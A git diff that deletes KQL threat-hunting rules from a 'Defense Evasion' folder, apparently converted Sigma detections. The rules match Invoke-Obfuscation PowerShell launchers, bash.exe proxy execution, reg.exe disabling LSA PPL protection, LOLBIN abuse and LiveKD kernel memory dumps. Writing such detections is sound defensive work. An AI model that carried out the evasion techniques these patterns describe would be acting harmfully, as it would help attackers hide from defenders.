diff --git a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql
deleted file mode 100644
index cce1ac92..00000000
--- a/Defense Evasion/Indirect_Command_Execution_From_Script_File_Via_Bash.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/15
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql b/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql
deleted file mode 100644
index 833625c5..00000000
--- a/Defense Evasion/Indirect_Inline_Command_Execution_Via_Bash.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/11/24
-// Level: medium
-// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
-This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
-
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql b/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql
deleted file mode 100644
index 3f8cac71..00000000
--- a/Defense Evasion/InfDefaultInstall.exe_.inf_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql b/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql
deleted file mode 100644
index 11e34eff..00000000
--- a/Defense Evasion/Insensitive_Subfolder_Search_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: low
-// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s "))
\ No newline at end of file
diff --git a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql b/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Defense Evasion/Install_New_Package_Via_Winget_Local_Manifest.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql b/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql
deleted file mode 100644
index f419e936..00000000
--- a/Defense Evasion/Internet_Explorer_DisableFirstRunCustomize_Enabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
-
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Internet Explorer\\Main\\DisableFirstRunCustomize") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\ie4uinit.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_CLIP+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Defense Evasion/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
--- a/Defense Evasion/Invoke-Obfuscation_STDIN+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql b/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Defense Evasion/Invoke-Obfuscation_VAR+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql b/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Stdin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_Clip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Defense Evasion/Invoke-Obfuscation_Via_Use_MSHTA.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Defense Evasion/JScript_Compiler_Execution.kql b/Defense Evasion/JScript_Compiler_Execution.kql
deleted file mode 100644
index 5249425a..00000000
--- a/Defense Evasion/JScript_Compiler_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/05/02
-// Level: low
-// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
-Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
-
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql b/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql
deleted file mode 100644
index 1aa5330d..00000000
--- a/Defense Evasion/Kavremover_Dropped_Binary_LOLBIN_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/01
-// Level: high
-// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\kavremover.exe" or InitiatingProcessFolderPath endswith "\\cleanapi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql b/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql
deleted file mode 100644
index 66c34716..00000000
--- a/Defense Evasion/Kernel_Memory_Dump_Via_LiveKD.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql b/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql
deleted file mode 100644
index 9661cd24..00000000
--- a/Defense Evasion/LOL-Binary_Copied_From_System_Directory.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/29
-// Level: high
-// Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and ((ProcessCommandLine contains "\\bitsadmin.exe" or ProcessCommandLine contains "\\calc.exe" or ProcessCommandLine contains "\\certutil.exe" or ProcessCommandLine contains "\\cmdl32.exe" or ProcessCommandLine contains "\\cscript.exe" or ProcessCommandLine contains "\\mshta.exe" or ProcessCommandLine contains "\\rundll32.exe" or ProcessCommandLine contains "\\wscript.exe") and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS"))
\ No newline at end of file
diff --git a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql b/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 3a052bf3..00000000
--- a/Defense Evasion/LSA_PPL_Protection_Disabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/22
-// Level: high
-// Description: Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
-// Tags: attack.defense_evasion, attack.t1562.010
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SYSTEM\\CurrentControlSet\\Control\\Lsa" and (ProcessCommandLine contains " add " and ProcessCommandLine contains " /d 0" and ProcessCommandLine contains " /v RunAsPPL ")) and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql b/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql
deleted file mode 100644
index 6b429c52..00000000
--- a/Defense Evasion/Launch-VsDevShell.PS1_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
-// Tags: attack.defense_evasion, attack.t1216.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql b/Defense Evasion/Legitimate_Application_Dropped_Archive.kql
deleted file mode 100644
index 61f36222..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Archive.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write an archive to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql b/Defense Evasion/Legitimate_Application_Dropped_Executable.kql
deleted file mode 100644
index 7435b284..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Executable.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write executables to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/Defense Evasion/Legitimate_Application_Dropped_Script.kql b/Defense Evasion/Legitimate_Application_Dropped_Script.kql
deleted file mode 100644
index 73e265bc..00000000
--- a/Defense Evasion/Legitimate_Application_Dropped_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/08/21
-// Level: high
-// Description: Detects programs on a Windows system that should not write scripts to disk
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation.kql b/Defense Evasion/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Defense Evasion/LiveKD_Driver_Creation_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Defense Evasion/LiveKD_Kernel_Memory_Dump_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
deleted file mode 100644
index 815998df..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_A_Suspicious_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: high
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql b/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
deleted file mode 100644
index c3b92be9..00000000
--- a/Defense Evasion/Load_Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Luc Génaux
-// Date: 2023/11/28
-// Level: low
-// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
-This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
-It could also be used for anti-analysis purposes by shut downing specific processes.
-
-// Tags: attack.impact, attack.defense_evasion, attack.t1486, attack.t1562.001
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp"))))
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql
deleted file mode 100644
index aa25bb7b..00000000
--- a/Defense Evasion/Lolbin_Runexehelper_Use_As_Proxy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\runexehelper.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql
deleted file mode 100644
index a4536f33..00000000
--- a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql
+++ /dev/null
